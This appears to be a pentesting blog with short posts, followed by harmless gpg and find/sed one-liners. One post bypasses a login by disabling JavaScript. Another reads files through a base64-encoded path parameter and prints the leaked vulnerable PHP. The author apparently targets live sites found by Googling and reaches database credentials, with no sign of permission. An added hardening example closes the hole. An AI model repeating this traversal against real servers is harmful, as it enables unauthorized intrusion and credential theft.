Pentesting reports

Notes on penetration testing journeys

Author: trouble

Keep JavaScript disabled, and strange things could happen

Posted on 2019/02/01 by trouble

Have you ever surfed the web with JavaScript disabled? It is another web, faster for sure. It is a must if you’re surfing the Tor network. It is a strong suggestion even when surfing the clearnet. JavaScript can expose some personal info about us; that is a fact.

Well, long story short, some days ago I was looking for login forms to bypass and as usual I was browsing with JavaScript disabled. I opened the next Google result and boom! The admin area was in front of me! Wait… where is the login form? I tried enabling JavaScript and… there is the login form. So, disabling JS again would let me enter the admin area. The easiest exploit ever done.

Posted in Bypass login. Tagged bypass login, javascript, javascript disabled, js, no javascript, no js

Arbitrary file download: an example

Posted on 2019/02/01 by trouble

I found a lot of sites with URLs containing a GET variable whose value is a physical path and a file name. I’m not sure why a web developer would ever implement a horrible thing like that but… still they do. If you want to know more about this kind of vulnerability, head to mitre.org.

Oh and even worse, some developers think that encoding that relative path with base64 would keep away hackers / pentesters. My article is an example of this kind.

So the other day I was googling around when I found a site where a user can download PDF documents, but the strange thing is that the link to download the file is as follows:

http://foobar.com/down.php?download=dXBsb2FkL2ZpbGVzLzc0OC1pbnN0cnVjdGlvbnMucGRm

Let’s decode that string “dXBsb2FkL2Z…” using base64decode.org :

upload/files/748-instructions.pdf

Bingo! A relative path with a file name. Let’s try to encode the relative path to the file down.php itself:

http://foobar.com/down.php?download=ZG93bi5waHA=

The response is what I was expecting, the source code of down.php:

<?php
session_start();

if ($_GET['download'])
{
    $download = $_GET['download'];
    $file = base64_decode($download);
    $file_name = basename($file);
    $file_name = substr($file_name,11);

    if (file_exists($file))
    {
        header("Expires: Mon,  10 Dec 2001 08:00:00 GMT");
        header("Last-Modified: ".gmdate("D,  d M Y H:i:s")." GMT");
        header('Content-Type: '.content_type($file_name));
        header('Content-Disposition: attachment; filename="'.$file_name.'"');
        header('Content-Length: '.filesize($file).'; ');
        readfile($file);
    }
    else
    {
        //header("Location: " . $_SERVER['HTTP_REFERER']);
        //header("HTTP/1.0 404 Not Found");
        echo "<p>File $file_name does not exist.</p>";
        die;
    }
}


function content_type($name) {
    $contenttype  = 'application/octet-stream';
    $contenttypes = array (
                            'aif'   =>  'audio/x-aiff',
                            'aifc'  =>  'audio/x-aiff',
                            'aiff'  =>  'audio/x-aiff',
                            'avi'   =>  'video/x-msvideo',
                            'bmp'   =>  'image/bmp',
                            'css'   =>  'text/css',
                            'doc'   =>  'application/msword',
                            'dvi'   =>  'application/x-dvi',
                            'dxr'   =>  'application/x-director',
                            'eml'   =>  'message/rfc822',
                            'gif'   =>  'image/gif',
                            'htm'   =>  'text/html',
                            'html'  =>  'text/html',
                            'jpe'   =>  'image/jpeg',
                            'jpeg'  =>  'image/jpeg',
                            'jpg'   =>  'image/jpeg',
                            'log'   =>  'text/plain',
                            'mid'   =>  'audio/midi',
                            'midi'  =>  'audio/midi',
                            'mov'   =>  'video/quicktime',
                            'movie' =>  'video/x-sgi-movie',
                            'mp2'   =>  'audio/mpeg',
                            'mp3'   =>  'audio/mpeg',
                            'mpe'   =>  'video/mpeg',
                            'mpeg'  =>  'video/mpeg',
                            'mpg'   =>  'video/mpeg',
                            'mpga'  =>  'audio/mpeg',
                            'oda'   =>  'application/oda',
                            'pdf'   =>  'application/pdf',
                            'png'   =>  'image/png',
                            'ppt'   =>  'application/vnd.ms-powerpoint',
                            'qt'    =>  'video/quicktime',
                            'ra'    =>  'audio/x-realaudio',
                            'ram'   =>  'audio/x-pn-realaudio',
                            'rm'    =>  'audio/x-pn-realaudio',
                            'rpm'   =>  'audio/x-pn-realaudio-plugin',
                            'rtf'   =>  'text/rtf',
                            'rtx'   =>  'text/richtext',
                            'rv'    =>  'video/vnd.rn-realvideo',
                            'shtml' =>  'text/html',
                            'swf'   =>  'application/x-shockwave-flash',
                            'tar'   =>  'application/x-tar',
                            'text'  =>  'text/plain',
                            'txt'   =>  'text/plain',
                            'tgz'   =>  'application/x-tar',
                            'tif'   =>  'image/tiff',
                            'tiff'  =>  'image/tiff',
                            'wav'   =>  'audio/x-wav',
                            'word'  =>  'application/msword',
                            'xht'   =>  'application/xhtml+xml',
                            'xhtml' =>  'application/xhtml+xml',
                            'xl'    =>  'application/excel',
                            'xls'   =>  'application/vnd.ms-excel',
                            'xml'   =>  'text/xml',
                            'xsl'   =>  'text/xml',
                            'zip'   =>  'application/zip'
                          );

    $name = ereg_replace("§", " ", $name);
    foreach ($contenttypes as $type_ext => $type_name) {
        if (preg_match ("/$type_ext$/i",  $name)) $contenttype = $type_name;
    }
    return $contenttype;
}
?>

The next step was to request the source code of index.php, where I found the include file containing the database credentials. End of game.
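
One way to close the hole shown above, as an added example that is not part of the original post or the site's code: the directory is fixed on the server, only the file name is taken from the request, and the resolved path and extension are checked before anything is read. The function name resolve_download, the temporary directory layout and config.inc.php are assumptions constructed for the demonstration.

```php
<?php
// Added example, not the site's code. The directory layout is constructed for the demo.

function resolve_download(string $param, string $root): ?string
{
    $decoded = base64_decode($param, true);           // strict mode rejects non-base64 input
    if ($decoded === false || $decoded === '' || strpos($decoded, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // Keep only the file name: the directory is chosen by the server, not the client.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . basename($decoded));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // realpath() has followed symlinks; the result must still sit under the root.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Serve only the document type the feature exists for.
    if (strtolower(pathinfo($candidate, PATHINFO_EXTENSION)) !== 'pdf') {
        return null;
    }
    return $candidate;
}

// Constructed layout: <tmp>/site/down.php and <tmp>/site/upload/files/*.pdf
$site = sys_get_temp_dir() . '/dl-demo-' . getmypid();
mkdir("$site/upload/files", 0700, true);
file_put_contents("$site/down.php", '<?php /* source */');
file_put_contents("$site/upload/files/748-instructions.pdf", '%PDF-1.4');
file_put_contents("$site/upload/files/config.inc.php", '<?php /* secrets */');

$tests = [
    'upload/files/748-instructions.pdf' => true,   // the legitimate link from the post
    'down.php'                          => false,  // the request that returned the source
    '../../down.php'                    => false,  // traversal out of the download root
    'config.inc.php'                    => false,  // inside the root, wrong type
];
foreach ($tests as $path => $expected) {
    $got = resolve_download(base64_encode($path), "$site/upload/files") !== null;
    printf("%-36s %s\n", $path, $got === $expected ? 'ok' : 'UNEXPECTED');
}
```

A download script would pass the returned path to readfile() and answer with a 404 when the function returns null. Base64 stays in the URL only for compatibility with existing links; it adds no protection.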

Posted in Arbitrary file download. Tagged arbitrary file download, CWE-23, Relative Path Traversal, vulnerable

PGP: encrypt file content to stdout

Posted on 2019/01/08 - 2019/01/10 by trouble

Sometimes I don’t simply want to encrypt files, I need to encrypt plain text only, e.g. to send it in the body of an email. I’m using PGP (Pretty Good Privacy) because it’s widely used and it can be installed on Linux, Windows and OSX machines. Well, on *nix machines the program is called GPG (GNU Privacy Guard), but that’s the only difference. Furthermore, instead of creating To encrypt file content (not the file itself!) use this bash one-line command:

cat PLAINFILE | gpg -a -o - -r RECIPIENT -e -

It will dump the encrypted content, additionally with ASCII armor (option -a or --armor), to stdout (option -o -); therefore no data, although encrypted, will ever be written to disk. Use this bash one-line command to decrypt PGP-encrypted data to stdout rather than to a file.

Posted in Bash one-liners. Tagged bash, encrypt, gpg, pgp

PGP: decrypt file contents to stdout

Posted on 2019/01/08 - 2019/01/10 by trouble

Using the following bash one-line command, the decrypted content will be shown on stdout rather than written to a file:

gpg -o - -d ENCRYPTEDFILE

To encrypt file content (not the file itself) with pgp and dump the output to stdout use this bash one-line command.

Posted in Bash one-liners. Tagged bash, decrypt, gpg, pgp

Bash one-line command: find files and replace strings in them

Posted on 2019/01/08 - 2019/01/08 by trouble

The following bash one-line command is useful when you need to replace a string in multiple files (say, every .html file):

find . -type f -name '*.html' -exec sed -i -e 's/SEARCHTEXT/REPLACETEXT/g' {} \;

Posted in Bash one-liners. Tagged bash, find, sed
